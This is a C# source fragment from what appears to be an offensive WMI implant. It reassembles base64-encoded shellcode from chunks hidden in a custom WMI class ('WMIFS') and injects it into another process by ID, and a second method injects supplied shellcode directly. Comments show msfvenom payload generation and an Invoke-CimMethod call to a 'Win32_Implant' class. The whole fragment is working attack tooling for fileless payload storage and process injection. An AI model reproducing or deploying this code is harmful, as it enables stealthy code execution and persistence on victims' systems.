public static string InjectShellCodeWMIFSB64(string wmiClass, string fileName, Int32 processId)
{
//msfvenom -p windows/x64/exec --format csharp CMD=calc.exe
//Invoke-CimMethod -Class Win32_Implant -Name InjectShellCodeRemote -Argument @{shellCodeString=$payload; processId=[UInt32]432}
ConnectionOptions options = new ConnectionOptions();
options.Impersonation = System.Management.ImpersonationLevel.Impersonate;
ManagementScope scope = new ManagementScope("\\\\.\\root\\cimv2", options);
scope.Connect();
ObjectQuery queryIndexCount = new ObjectQuery("SELECT Index FROM WMIFS WHERE FileName = \'" + fileName + "\'");
ManagementObjectSearcher searcherIndexCount = new ManagementObjectSearcher(scope, queryIndexCount);
ManagementObjectCollection queryIndexCollection = searcherIndexCount.Get();
int indexCount = queryIndexCollection.Count;
String EncodedText = "";
for (int i = 0; i < indexCount; i++)
{
ObjectQuery queryFilePart = new ObjectQuery("SELECT FileStore FROM WMIFS WHERE FileName = \'" + fileName + "\' AND Index = \'" + i + "\'");
ManagementObjectSearcher searcherFilePart = new ManagementObjectSearcher(scope, queryFilePart);
ManagementObjectCollection queryCollection = searcherFilePart.Get();
foreach (ManagementObject filePart in queryCollection)
{
EncodedText += filePart["FileStore"].ToString();
}
}
byte[] peBytes = System.Convert.FromBase64String(EncodedText);
String shellCodeString = System.Text.Encoding.Unicode.GetString(peBytes);
InjectShellCodeRemote injectShellCodeRemote = new InjectShellCodeRemote(shellCodeString, (UInt32)processId);
return(injectShellCodeRemote.GetOutput());
}
public static string InjectShellCode(string shellCodeString, Int32 processId)
{
//msfvenom -p windows/x64/exec --format csharp CMD=calc.exe
//Invoke-CimMethod -Class Win32_Implant -Name InjectShellCodeRemote -Argument @{shellCodeString=$payload; processId=[UInt32]432}
InjectShellCodeRemote injectShellCodeRemote = new InjectShellCodeRemote(shellCodeString, (UInt32)processId);
return(injectShellCodeRemote.GetOutput());
}
